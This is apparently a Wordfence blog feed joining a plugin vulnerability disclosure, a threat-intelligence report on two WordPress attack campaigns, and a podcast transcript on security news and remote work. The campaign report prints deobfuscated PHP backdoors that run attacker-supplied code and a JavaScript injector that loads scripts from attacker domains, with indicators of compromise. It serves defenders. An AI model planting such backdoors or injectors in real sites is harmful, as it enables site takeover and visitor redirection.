Multiple Vulnerabilities Patched in Pricing Table by Supsystic Plugin

On January 17th, our Threat Intelligence Team discovered several vulnerabilities in Pricing Table by Supsystic, a WordPress plugin installed on over 40,000 sites. These flaws allowed an unauthenticated user to execute several AJAX actions due to an insecure permissions weakness. Attackers were also able to inject malicious Javascript due to a Cross-Site Scripting (XSS) vulnerability, access pricing table data, and forge requests on behalf of a site administrator because of a Cross-Site Request Forgery (CSRF) vulnerability.

These vulnerabilities could allow attackers the ability to run malicious Javascript on a visitor’s browser that could redirect site visitors to malicious websites, or even steal user cookies to authenticate as an administrator. We privately disclosed these issues to the plugin’s author, who released patches a month later.

We highly recommend updating to version 1.8.2 immediately as these security issues are fully patched in that version.

Wordfence premium users received a new firewall rule on January 18th to protect against exploits targeting these vulnerabilities. Free Wordfence users received this rule on February 17th.


Description: Insecure Permissions on AJAX Actions
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.1
CVE ID: CVE-2020-9392
CVSS Score: 7.3 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Patched Version: 1.8.2

Pricing Table by Supsystic provides users with the ability to easily add customizable pricing tables to their site. These can be used to display pricing for products or services and compare the differences between each offering. The plugin makes it easy to create new tables, import or modify tables, and export pricing table settings, all of which are powered by AJAX actions. While analyzing the plugin, we discovered that the AJAX actions were registered with a wp_ajax_nopriv_ hook, allowing any unauthenticated user the ability to successfully send an AJAX request completing an action registered with that hook.

 add_action('wp_ajax_nopriv_'. $this->_action, array($mod->getController(), $this->_action)); 

Upon further analysis, we found that despite the the actions being registered with a wp_ajax_nopriv_ hook, there was a separate security permission check on nearly all of the AJAX actions. However, we found that the permissions check was missing for a few select actions. The actions missing a permission check were: createFromTpl, a function that creates new pricing tables, getJSONExportTable, a function used to export existing tables, and importJSONTable, a function used to import a new pricing table or update an old one.

        public function getPermissions() {
	                return array(
                        PTS_USERLEVELS => array(
	                                PTS_ADMIN => array('getListForTbl', 'remove', 'removeGroup', 'clear',
                                        'save', 'exportForDb', 'updateLabel', 'changeTpl', 'saveAsCopy', 'getJSONExportTable', 'createFromTpl')

**You can see in this code snippet that getJSONExportTable, importJSONTable, and createFromTpl are missing from the getPermissions check at the bottom of the controller.php file. These were added in the latest version of the plugin.

This meant that any unauthenticated user could execute those 3 functions and obtain sensitive information regarding any given pricing table while creating and importing new pricing tables or altering already existing ones.

Information retrieved from getJSONExportTable.


Description: Unauthenticated Stored XSS
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.1
CVE ID: CVE-2020-9393
CVSS Score: 6.1 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Patched Version: 1.8.2

As an extension of the previous vulnerability, we discovered a stored XSS vulnerability could be exploited from the importJSONTable endpoint. This function is used to import a JSON body containing all of the settings needed to create a new pricing table or edit an already existing one.

Several of the parameters are handled without any input sanitization, allowing Javascript as an input. Alone, this wouldn’t be considered a security issue as user input supplied via the administrative dashboard isn’t sanitized due to the fact that administrators have the capability to add unfiltered_html. However, when combined with a situation where AJAX actions can be sent with no authentication, an XSS vulnerability is created.

In order to exploit this vulnerability, an attacker would need to send a request containing the details of the table they would like to modify, along with their malicious Javascript payload. This payload could be a script that steals user cookies and sends them off to an attacker for the attacker to gain administrative access to your site. Alternatively, this payload could also be a script that redirects users to a malicious site where their computer will be infected. The malicious javascript would then be executed anytime a user navigated to the page with the stored script.

An attacker could edit a pricing table so that the malicious payload only executed when an administrator accessed the pricing table list from the administrative dashboard, or it could be executed when any user accessed a page that displayed a pricing table. It simply depended on which parameter the malicious Javascript was injected into.

Here is what it would look like if just the name parameter was injected in the data label parameter and executed in the administrative dashboard.

Here is what it would look like if the custom html parameter was injected, executing on the front-end of a site.


Description: Cross-Site Request Forgery to XSS and Setting Changes
Affected Plugin: Pricing Table by Supsystic
Affected Versions: <= 1.8.0
CVE ID: CVE-2020-9394
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Patched Version: 1.8.1

To further escalate, we found that none of the endpoints in the plugin were protected by WordPress nonces for CSRF protection. The source of requests were not verified and an attacker could forge a crafted request on behalf of a site administrator and inject malicious Javascript or simply modify the settings of any given pricing table.

PoC Walkthrough: Exploiting XSS

Disclosure Timeline

January 17th, 2020 – Vulnerability initially discovered and analyzed. We begin working on firewall rules.
January 18th, 2020 – Firewall rule released for Wordfence premium users. Initial outreach to plugin team.
January 21st, 2020 – Developer confirms appropriate inbox for handling discussion. Full disclosure of vulnerabilities is sent.
January 30th, 2020 – Follow-up with the developer as no response from disclosure.
February 10th, 2020 – Additional follow-up as no response from disclosure still.
February 11th, 2020 – Developer acknowledges report. Notifies us that the patch will be released the following week.
February 17th, 2020 – Wordfence free users receive firewall rule.
February 21st, 2020 – Patch released. Missing permission check on one action, notified developer.
February 24th, 2020 – Sufficient patch released.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS, CSRF, and insecure permissions found in the Pricing Table by Supsystic plugin. These flaws have been patched in version 1.8.2 and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since January 18th. Sites running the free version of Wordfence received the same firewall rule update on February 17th, 2020.

The post Multiple Vulnerabilities Patched in Pricing Table by Supsystic Plugin appeared first on Wordfence.

Read More

Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities

As part of our ongoing research efforts, the Wordfence Threat Intelligence team continually monitors our network for noteworthy threats facing WordPress. Recently, we’ve been tracking malicious activity targeting several vulnerabilities recently patched in popular plugins.

In today’s post, we’ll provide details of our research into two active campaigns. We’ll also share some common indicators of compromise (IOCs) that can help you assess whether your site was impacted by these attacks. Wordfence malware scans will identify these IOCs and their variants on systems with the plugin installed, but we include them to help administrators and researchers better approach this data at scale.

Threat Actor #1: “tonyredball”

Notable Targeted Vulnerabilities:

The first campaign we’ll discuss has been associated with the handle “tonyredball”. This threat actor has primarily focused on exploiting vulnerabilities which allow backdoor access to victim sites.

We identified the “tonyredball” handle after the attacker attempted to exploit the administrator registration vulnerability in the Profile Builder plugin. Requests exploiting this vulnerability contain the username, email, and other profile details of the new administrator account.

Snippet from a blocked attempt to exploit Profile Builder by "tonyredball"Compared to this threat actor’s activity against Profile Builder, they’ve issued a much greater volume of attacks against the database deletion vulnerability in ThemeGrill Demo Importer. This difference in volume may be due to the amount of work required to exploit each vulnerability. The Profile Builder vulnerability requires attackers to locate a vulnerable registration form, but ThemeGrill’s vulnerability could be exploited with a simple request to a known endpoint.

The end result of exploiting either of these vulnerabilities is administrative access to the victim’s site. With this access, the attacker uploads malicious scripts through the plugin and theme uploaders in the WordPress dashboard.

Snippet of an attempt by "tonyredball" to upload a backdoor.

Snippet of an attempt by “tonyredball” to upload a backdoor.

Variants of the script uploaded in the example above have been previously associated with several filenames. The most common are blockspluginn.phpwp-block-plugin.php, and supersociall.php, though the primary names associated directly with this threat actor are wp-block-plugin.php and wp-hello-plugin.php.

if (isset($_POST['asavsdvds']) && md5($_POST["lgkfghdfh"]) == "e9787adc5271cb0f765294503da3f2dc") {
    $z2 = '<?php ' . base64_decode($_REQUEST['d1']);
    $a = '/tmp/mn';
    @file_put_contents($a, $z2);
    @include ($a);
    @unlink($a);
    die();
}

In the code sample above, we see part of the deobfuscated contents of wp-block-plugin.php. This small script allows an attacker to execute arbitrary PHP code on a victim’s site, establishing a persistent backdoor in case their administrator account is removed. The intended code is base64-encoded and submitted as $_REQUEST['d1'], where it’s decoded and stored as a file named /tmp/mn. This file is then executed via @include, and then immediately deleted from the server. It’s also password-protected to prevent other actors from using this backdoor.

We’ve intercepted a number of requests to these backdoors across our network. The payloads sent are varied in scope, but largely focus on iterating through a site’s file system to infect more files. Some events show “tonyredball” searching for additional WordPress installations to infect, while others try to inject malicious code into the victim’s legitimate JavaScript files.

if (strpos($g, 'hgkgfhjereve4') !== false) {
echo "#already exist#:".$f."\n";
} else {
$l2 = "var hgkgfhjereve4 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,108,111,119,46,100,101,115,116,105,110,121,102,101,114,110,97,110,100,105,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}";
$g = file_get_contents($f);
$g = $l2.$g;
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'hgkgfhjereve4') !== false) {
echo "#already exist#:".$f."\n";

This code snippet shows part of a backdoor payload intended to inject malicious JavaScript. In context, this code is executed after searching for filenames with .js and will insert new code above the existing content of the legitimate file. When run in a browser, this code sources a third-party script from https://slow.destinyfernandi.com/same.js?v=3.

This third-party script, when loaded, redirects the visitor’s browser to a potentially malicious location. Unlike more sophisticated malvertising scripts, there isn’t any conditional logic to prevent redirection for repeat visitors or logged-in users, meaning it’s much more likely to be caught and reported early. However, regardless of the current contents, scripts hosted on an attacker’s server can be modified at any time and it’s a major risk.

In addition to backdoor scripts, “tonyredball” also uses the WordPress plugin and theme editor to inject third-party JavaScript into a site’s content. A line like <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script> is added, usually to a theme’s header.php script, where it loads the script at https://middle.destinyfernandi.com/t.js into visitors’ browsers. We’ve identified additional domains used in these attacks, which are listed in the IOC section below.

 

Screenshot of a redirect destination attempting to trick visitors into allowing permissions.

Screenshot of a redirect destination attempting to trick visitors into allowing permissions.

Currently, these redirect scripts take victims to a landing page at the domain talktofranky.com. On arrival, visitors are told to click “Allow” in a popup to prove they’re human. This is a trick, as the site is actually requesting permission to push notifications to the victim’s device. Searches for discussion about this domain reveal a number of guides on how to stop the notification spam, meaning this campaign is likely claiming a number of victims.

The latest attacks by “tonyredball” are sourced from one primary IP address: 45.129.96.17. This address is associated with Estonian hosting provider GMHost. GMHost is a known bulletproof host, and has been referenced recently on hacking forums as such. “Bulletproof” refers to hosting providers known to have lax or unenforced abuse policies, commonly located in countries without close relationships with international law enforcement. These hosts give hackers a place to conduct illegal activity with little fear of being shut down or otherwise punished.

Indicators of Compromise (IOCs)

  • Username
    • tonyredball
  • Email address
    • tonyredball@mail.com
  • IP Addresses
    • 45.129.96.17
    • 188.127.251.74
  • Malware Hashes (SHA-1)
    • 34d4b9a33f7a1ab39a264cdffde644264adcf4d1
    • 7648b981f7c8f497ab81f0323379734fd0898f84
  • Searchable strings in obfuscated backdoors
    • jweyc
    • aeskoly
    • owhggiku
    • callbrhy
  • Script injected into plugin and theme files
    • <script type=text/javascript src='https://room.verybeatifulantony.com/t.js'></script>
    • <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script>
  • Malicious Domains
    • verybeatifulantony.com
    • room.verybeatifulantony.com
    • tom.verybeatifulantony.com
    • destinyfernandi.com
    • slow.destinyfernandi.com
    • middle.destinyfernandi.com
    • fast.destinyfernandi.com
    • talktofranky.com
  • Malicious filename
    • wp-block-plugin.php
    • wp-hello-plugin.php

Threat Actor #2 – “solarsalvador1234”

Notable Targeted Vulnerabilities:

Similar to “tonyredball”, we identified the handle associated with today’s second threat actor through their exploitation of the Profile Builder administrator registration vulnerability. These requests revealed a more sophisticated attack campaign than our previous example, as the threat actor was generating unique identifiers for each attempt.

In the requests we’ve blocked from this attacker, we see randomly-generated alphanumeric strings used as usernames, first and last names, and email addresses. Identifiers generated in this manner begin with a prefix (com_ in early attacks, then just com subsequently) followed by eight random characters. These are indexed together: one attack might use comxAwqw5de as the username and comxAwqw5de@mail.com as the email, and the next attack would use a different generated string for those values.

However, for a period of about two and a half hours on February 17th, the requests weren’t using a random email address. More than a hundred blocked requests in this window used the same email address: solarsalvador1234@gmail.com. These attacks came from the same IP as the rest in this campaign, and still used the random naming scheme for the created usernames.

Screenshot of Google search results showing "solarsalvador1234" as an Author on multiple hacked sites.

Screenshot of Google search results showing “solarsalvador1234” as an Author on multiple hacked sites.

The email address solarsalvador1234@gmail.com has been previously associated with attacks against the Convert Plus plugin, where a similar vulnerability allowed attackers to register a privileged user. Google searches for this address reveal a number of compromised WordPress sites showing an associated user profile.

In addition to the Profile Builder and ThemeGrill Demo Importer vulnerabilities, the IP address associated with “solarsalvador1234” is also exploiting Duplicator’s recent file download flaw. By downloading wp-config.php files from vulnerable sites, they can use the stored credentials to access remote MySQL databases and compromise the site from there. In all three vulnerabilities, the end goal is the same: Administrative access to the victim’s WordPress site.

In the attacks we’re currently tracking, we’ve identified “solarsalvador1234” attempting to upload backdoors through the same method as “tonyredball”: the WordPress theme uploader. However, instead of uploading a single file as in our previous example, they upload a malicious archive named AdvanceImage5.zip. This ZIP archive technically contains a valid WordPress theme, having copied the index.php and style.css scripts from the Twenty Fifteen theme, required for WordPress to correctly store the extracted files. Other than those required files, the archive is purely malicious and contains backdoors intended to help the attacker maintain access long-term. The malicious theme AdvanceImage5 has previously been associated with other attack campaigns, including those targeting last year’s vulnerability in the WP Cost Estimation plugin.

 

<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function sh_decrypt($data, $key) { global $auth; return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key); } foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

The code snippet above shows the deobfuscated contents of the campaign’s primary backdoor, located in AdvanceImage5/header.php . This script features protections much like our earlier example, intended to prevent other attackers from abusing the script. Taking things a step further, an XOR cipher is used to encrypt requests sent to the backdoor, presumably in an attempt to bypass detection by firewalls and security teams. Ultimately though, the behavior is the same for “solarsalvador1234” as it is for the backdoor used by “tonyredball”, an attacker can execute PHP scripts at will on the infected site.

The activity associated with “solarsalvador1234” is linked to the IP address 77.71.115.52. We mentioned this address in our earlier post about attacks against a recent Duplicator vulnerability, noting that a number of otherwise-legitimate websites are hosted on the server. It’s not uncommon for attacks to come from compromised webservers, as they offer attackers a layer of abstraction to hide their physical location from victims.

Indicators of Compromise (IOCs)

  • Usernames
    • Randomly generated, starting with com or com_
  • Email addresses
    • solarsalvador1234@gmail.com
    • Other randomly generated addresses, starting with com or com_ and ending with @mail.com
  • IP Address
    • 77.71.115.52
  • Malware Hashes (SHA-1)
    • 47cb1646eba89f42319aa757423464476eb2fa7d
    • 3015d8f30b23eb6ebec608e992ff25ceccc6408d
    • f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6
    • 93632169238cbb52daee5271c90c533f7614e7b1
  • Malicious Filepaths
    • wp-content/themes/AdvanceImage5/config.php
    • wp-content/themes/AdvanceImage5/functions.php
    • wp-content/themes/AdvanceImage5/header.php

Conclusion

The campaigns we’ve detailed in this post are just two examples of attacks targeting recently patched vulnerabilities. As the owner of a site, it’s your responsibility to remain aware of the changes made to the plugins and themes you use. When a security update is released, make it an immediate priority to install it. The threat actors facing the WordPress ecosystem quickly identify and exploit vulnerabilities, which compounds the importance of timely action to protect your infrastructure.

All of the malicious code discussed in this post is detected by the Wordfence malware scanner. This is true for Premium users as well as the sites still using the free version. If you’re unable to use Wordfence and are concerned about these campaigns, please make use of the indicators of compromise (IOCs) we’ve shared to assist in your analysis.

The Wordfence Threat Intelligence team is always on the lookout for new activity to report to the community. Whether new developments arise in the campaigns we’ve discussed today, or something entirely new descends on the WordPress ecosystem, we’ll report our findings as they emerge.

Special thanks to Director of Threat Intelligence Sean Murphy and QA Engineer Ram Gall for their assistance researching these attack campaigns and editing this post.

The post Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities appeared first on Wordfence.

Read More

Episode 66: New Plugin Vulnerabilities & Succeeding as a Digital Nomad with Chloe at WCPHX

It has been a busy week in WordPress security with active attacks on a number of plugins including ThemeRex Addons and Theme Grill Demo Importer plugins. In this week’s Think Like a Hacker, we look at what’s happening, review what a zero-day vulnerability is, and give you some advice on keeping WordPress installations clean and safe.

We also look at a vulnerability uncovered in the wpCentral plugin installed on over 60,000 sites, a WHO phishing attack, and Malwarebytes’ State of Malware report.

At WordCamp Phoenix, Wordfence Threat Analyst Chloe Chamberland spoke to a packed room of attendees looking to learn more about how she succeeds working remotely as a digital nomad.

Her talk starts at 19:13 if you’d like to skip ahead, though we recommend watching her talk on the YouTube video embedded below to see Chloe’s travel photos and audience interaction.

Here are timestamps for the audio if you would like to skip around:
4:27 Vulnerability in wpCentral Plugin Leads to Privilege Escalation
7:11 Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild
10:00 What is a “Zero Day”
11:28 Critical Issue In ThemeGrill Demo Importer Leads To Database Wipe and Auth Bypass
13:05 Keeping your WordPress installation clean
13:45 World Health Organization Warns of Coronavirus Phishing Attacks
16:28 Malwarebytes State of Malware 2020 Report
19:13 How to Succeed at Working Remotely as a Nomad – Chloe Chamberland’s talk at WordCamp Phoenix, video embedded below

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Chloe Chamberland on Twitter as @infosecChloe.

Please feel free to post your feedback in the comments below.

Transcript for Episode 66

Kathy Zant:
Welcome to Think Like a Hacker, the podcast about WordPress security and innovation. I am Kathy Zant, your host, and this is episode 66. So, we have a number of plugin vulnerabilities to discuss as well as audio from Chloe Chamberland’s talk at WordCamp Phoenix. Now, I interviewed Chloe a few weeks ago from a remote location in Alaska where she was seeing the Aurora Borealis as well as meeting a moose for the first time. At WordCamp Phoenix, she gave a presentation where she outlined what made her successful as a remote working digital nomad. Her talk was incredibly successful. I had a number of people come up to me after her talk saying how much they enjoyed it and the inspiration they got from Chloe’s talk. So, we hope you enjoy that.

Now, if you know someone that you think would make an interesting guest and think like a hacker, please reach out to press@wordfence.com. We have a number of guests coming on the show in the next few weeks, but I want to hear from you. What are some of the challenges, some of the things you’re thinking about. What can we do to make your WordPress life easier? So press@wordfence.com, that comes to me and I will be in touch.

First of all, we have a new story about WordCamp Asia. Now, as many of you know, WordCamp Asia was canceled last week. The announcement came out, I think on February 11th, that it was canceled because of concerns in the region tied to the coronavirus. We did receive news that WordCamp Asia for 2021 has been scheduled. It is scheduled for January 2021.

Now, if you had a plan to go to WordCamp Asia and did not recoup all of your cancellation fees or found some financial hardship in this cancellation, there is a fund set up for some remuneration that could help you with that. That fund was started by Wordfence, and GoDaddy and Yoast also contributed. Now there are still funds available as a part of this assistance package. There is a process to go through in order to apply for assistance.

That is all detailed on the blog and I’ll have notes, links in the show notes.

We do have a number of plugin vulnerabilities to discuss today, but first I wanted to make a note, an editorial about plugin vulnerabilities and what it means for WordPress. Now there may be people out there that tell you “WordPress’s insecure, look at all the plugin vulnerabilities that exist.” I would take a contrary opinion to that primarily because the fact that WordPress is open-source means that plugin vulnerabilities, theme vulnerabilities, even vulnerabilities in core are disclosed, firewalled, patched much more quickly than a closed-source system might experience. So, the fact that we are seeing these vulnerabilities discussed and disclosed and firewalled is evidence that WordPress is secure and WordPress is secure more than I think other systems because of the community that’s associated with WordPress. It’s part of what makes WordPress unique. It’s part of what makes open source unique.

So don’t be afraid because you hear about plugin vulnerabilities and instead, feel empowered. Feel empowered by the fact that security researchers are poking at WordPress plugins. We are poking at WordPress core and themes and we are looking for vulnerabilities all of the time. This is just one way that WordPress and Wordfence and the other security researchers who are looking at vulnerabilities are working to keep your site, your business, and your assets as safe as possible.

So plugin vulnerability number one. This was published by Chloe Chamberland on February 17th. This was a vulnerability in the wpCentral plugin and this led to a privilege escalation. So, on February 13th, our threat intelligence team at Wordfence discovered a vulnerability in wpCentral. This was installed on over 60,000 sites at the time of our discovery. So wpCentral is a WordPress plugin. It’s designed to be used along with the wpCentral management dashboards. So this is another plugin that you plug into your WordPress site that allows you to basically manage WordPress through a different interface.

The software is designed to make site management easy and it has functionalities including automated sign-on with one click, as well as the ability to create backups, edit posts in their premium version and other things of that nature. So, this privilege escalation flaw allowed anyone that had an account on a WordPress site to basically escalate their privileges to that of an administrator, which is definitely problematic if you have a WordPress site that allows anyone to register. So if someone comes along and wants to register for updates and their level is a subscriber, they would then be able to escalate their privileges from a subscriber to an administrator, which of course, leads to a complete site takeover.

So of course, Chloe found this vulnerability, contacted the developer, and they made a number of changes to their plugin to ensure that their users are safe. We created a firewall rule to protect Wordfence premium customers and free users will receive that rule on March 15th.

And one note with this, even though we have a firewall rule in place to help protect our customers, it doesn’t completely protect against exploiting this vulnerability. So what’s really important if you’re using wpCentral to make sure that your site, your plugin is updated to the most recent version. You see, the problem is that exploitation and legitimate request via wpCentral look pretty much the same. So, if we’re going to block access to it being exploited, we would have to block legitimate requests as well. So, update your plugin.

The next vulnerability is a little scary. We heard about this actually from a customer, from a user who had seen some negative things happen on their site, and upon further investigation, we found that there was a zero-day vulnerability in a plugin called ThemeREX Addons, and that this is currently being exploited in the wild. We were seeing some rest end point usage that, because the REST-API endpoint was unprotected and improperly configured, we were seeing attackers actually adding malicious administrative users to sites that had this plugin installed.

So, we’ve investigated this and it appears that the REST-API endpoint within this plugin is unprotected and improperly configured. Attackers have already discovered this, and they are actively exploiting this on sites that are using this plugin. We estimate that there are probably about 44,000 sites that are using this plugin that are vulnerable. So we pushed out a firewall rule to premium customers. So they received that rule on February 18th at approximately 3:16 PM UTC to protect against this vulnerability being exploited. Free users will not receive this rule until March 19th. So if you are using this plugin, we are recommending at this point that you delete it from your site. Don’t just deactivate it, just delete it. It’s very good practice to remove any and all plugins that you don’t need on your WordPress sites if you’re not actively using them. And if you’re actively using this one, you obviously have to throw this in the balance.

What’s more important, keeping your site safe from intrusion or the functionality that you are receiving from this plugin? If the functionality is so great that you’re willing to take the risk, well that is your choice. If you positively need this functionality, now’s a good time to look at Wordfence premium because that’s going to protect you even though you’re using a vulnerable plugin. Now we don’t have a ton of data on who’s exploiting this vulnerability or what exactly they are doing other than the fact that we have seen suspicious administrative accounts on sites using this plugin. We will provide more details as they emerge. So if you’re unsure about this plugin and where it shows up, the plugin slug is “trx_addons.” So you would see that in your plugins directory.

So I guess now’s a good time to explain what a zero-day is. So a zero-day can be referring to a software vulnerability or it can be referring to an exploit.So it is a zero-day vulnerability or a zero-day exploit. So zero-day vulnerabilities refer to security holes in software. And now it could be in WordPress, it could be in your browser and could be in your phone. It refers to any vulnerability that exists in software. Now zero-days are not known to the software maker or to antivirus vendors. And so even though this vulnerability is not publicly known, it may be known to attackers who are quietly exploiting it, such is the case with this plugin. So think of a zero-day as basically an unlocked door, an open window, just a way into a system that attackers know about. As I’m sure you’re aware, zero-days are never any fun. You probably don’t discover that your software is vulnerable until you see exploits coming at it. And this is extraordinarily unfortunate when the users of your software are the ones experiencing the exploits.

Our final plugin vulnerability of this week was discovered by our friends at WebARX Security. They found a critical issue in ThemeGrill Demo Importer and this critical vulnerability led to database wipe and authorization bypass. So basically, it was allowing any authenticated user to get into a website, wipe the database, and basically become an administrator. At the time of discovery, this plugin had over 200,000 active installations and it was used to import official theme demo, content, widgets, and other theme settings with just a click. It was not required in order to use any of the ThemeGrill themes. It was just something that basically helped you get started. So it was not something that really needed to remain on a WordPress site. Yet many users, over 200,000 of them, had this installed. Now, after this vulnerability was disclosed, the install count dropped drastically. I guess people were saying, “Hey, I don’t really need this after all.” WebARX discovered this on February sixth and released a patch to all of their customers and reported that issue to the developer. And the developer published a new version which fixed the issue on February 16th.

So either update that plugin or if you’re not using it, just remove it from your site. Just another lesson in keeping your WordPress installations pretty tight and clean. If you are not using a theme, you should remove it. Don’t just deactivate it, actually remove it, delete it from the site. If you aren’t using a plugin, don’t just deactivate it. I have cleaned numerous sites that basically looked like the digital edition of Hoarders with hundreds of plugins installed and all deactivated and, of course, not updated. Really keep your WordPress installations updated and clean and of course, use Wordfence.

In non-WordPress security news, we have a couple of stories that I just wanted to bring to your attention. First of all, of course, there is fear in the world. Everyone is very concerned about the coronavirus, and phishing scammers see this as a perfect opportunity. Because when you are in a state of fear, you are apt to make decisions that you normally wouldn’t in your life. So phishing scammers are posing as the World Health Organization (WHO) and they’re trying to exploit coronavirus fears.

So, the WHO says that they are seeing offending emails, asking recipients to hand over sensitive information like usernames and passwords, and they’re including malicious links and attachments that are triggering installation of malware. Any time you see an email that is triggering fear, that is asking you to take immediate action or grave things are going to happen in your life, you need to take a step back from the computer and take a deep breath, and then maybe take another deep breath, and look carefully with the discerning eye at whatever is trying to trigger you into taking immediate action. Scammers prey on our fears and they prey on our fear of missing out, our fear of loss. And it’s just extraordinarily unfortunate as we are all dealing with this crisis that scammers are stepping up to the plate and taking a swing. But hackers gonna to hack and scammers gonna scam, and it’s just up to us to remain vigilant. And it’s important for us to not just remain vigilant for ourselves and for our family, but for our community as a whole.

Spread the word, educate older people who are often victims of scams like this, let them know what phishing is. Let them know how phishing works and let them know how scammers work. And it’s not just happening in emails, I’m sure. I’m sure it’s happening via telephone, via text, and it’s important for us to educate everyone we can so that everyone can stay safe. When everyone’s safe, it takes away the financial incentive that scammers and hackers have because we are on to them. Scammers and hackers and even spammers wouldn’t do what they do if it wasn’t profitable. So by reducing the surface area of their profitability, by keeping our communities safe, we make the world safer for everyone.

And in our final story, Malwarebytes Labs released their State of Malware report for 2020 last week. They took a look at the threats to both Mac and Windows/PC, the TL;DR or the too long/didn’t read, of this entire thing, is that malware and hackers and scammers and everyone we’re fighting against are becoming increasingly sophisticated.

What does that mean to you and me? It means that our defenses need to become increasingly sophisticated. So, I’m a Mac user, and I remember a time not long ago when Mac users were able to say, “Well, we don’t get malware because all of the malware is on Windows.” In 2020, Malwarebytes is reporting that Mac threats increased exponentially in comparison to those against Windows. Now, something to consider is that more Mac users are using Malwarebytes, so of course, they [Malwarebytes] are seeing more malware. When calculated end threats per endpoint, Mac still outpaced windows; however, by nearly two to one. So maybe, I need to apologize to all my windows using friends. Another takeaway from this report is that if you are working in the enterprise, the volume of global threats against business endpoints has increased 13% year over year, with aggressive adware, Trojans and HackTools leading the path.

Organizations are being hammered with Emotet and TrickBot to Trojan turned botnets that surfaced as the top five threats for nearly every region of the globe. TrickBot detections in particular had increased more than 50% over the previous year. I’ll have a link to the full report. The biggest takeaway I think just looking at the state of computing right now is that it is incredibly important for us to stay on the front lines, to stay informed. Education is the number one tool in staying secure. If you know what the hackers are up to, it is incredibly easy to stay protected. If you are unaware of how malware works, of how hackers work, how scammers and spammers and phishers and all of these bad guys are operating, this is when you are caught by surprise.

So, we are here to ensure that you are aware of what they’re up to so that you can protect the things and the people and the websites of course that are most important to you. That is the news for this week.

Up next is Chloe Chamberland at WordCamp Phoenix. We hope you enjoy this [talk]. You can also watch the full [talk]; it is released on our YouTube channel with all of Chloe’s slides. This is a good one to watch actually because you can see all of Chloe’s amazing pictures of all the places that she has been fighting the bad guys and helping customers recover from those attacks. She has been to some pretty amazing places. So thanks for listening and we will talk to you soon.

Chloe Chamberland:
So, who am I? I am a threat analyst at Wordfence. I go on the hunt for vulnerabilities and things inside of plugins and themes, and I have worked in multiple roles there. So I used to be a site cleaner, so I would clean hack sites and work with customers for that. And I used to be a customer service engineer, and so I was heavily [involved] or helping customers. And I did all three of these roles while traveling. So I think you can handle just about any role working remotely, and I highly recommend doing so. And I like to say I have two passions. I love security and I love traveling and I get to do both and it just makes me really happy and excited and hopefully I can inspire you to start traveling while you’re doing it or give you some tips if you already do.

I never really decided, I want to just go travel and work at the same time. It just kind of happened naturally. So I never really did any research. And so today I’m going to share with you some of the things that I learned from it and share with you some of the experiences I’ve had, and see why you might want to do it. So where I’ve been, I’ve been kind of around the world a little bit. I’ve been to China, Japan, London, Barcelona, Italy, a bunch of places in the States, a bunch of places in the Caribbean, a bunch of places in Canada. Last year, I spent 150 days away from home and this year my goal is 220 days away from home. And I’m hoping eventually I can go fully remote, like three months at different places all year long. I just have cats, and I need to figure out a way to get them to come with me because I love them so much.

Okay, so why travel when working? I feel like there’s kind of this connotation that when you’re traveling, you’re on vacation almost, but it’s not like that at all. It’s totally different. You’re traveling. It’s not always peachy and easy and it’s a challenge, but I genuinely think it’s so worth it. And I think if you’re at home working and you don’t have anything to do after work or things like that, why not be somewhere else in the world and be somewhere where you can explore at the end of your work day?

And so that brings me to travel is worth it. I have this quote from Anthony Bourdain that I just wanted to read. “Travel isn’t always pretty, it isn’t always comfortable. Sometimes it hurts. It even breaks your heart but that’s okay. The journey changes you, it should change you. It leaves marks on your memory, on your consciousness, on your heart, and on your body. You take something with you, hopefully you leave something good behind.”

And I think this applies both to working while you’re traveling and just traveling in general. It’s not always going to be easy. It’s not always going to be pretty. You’re going to see different things that are going to open your perspective and change your mind, but it is so worth it and it makes you a better person every single day and it makes you appreciate a lot of things in life more. So, one of the first main points is you’re going to have beautiful experiences. You’re going to see different places, you’re going to try different foods, you’re going to meet amazing people. And I’m about to start crying.

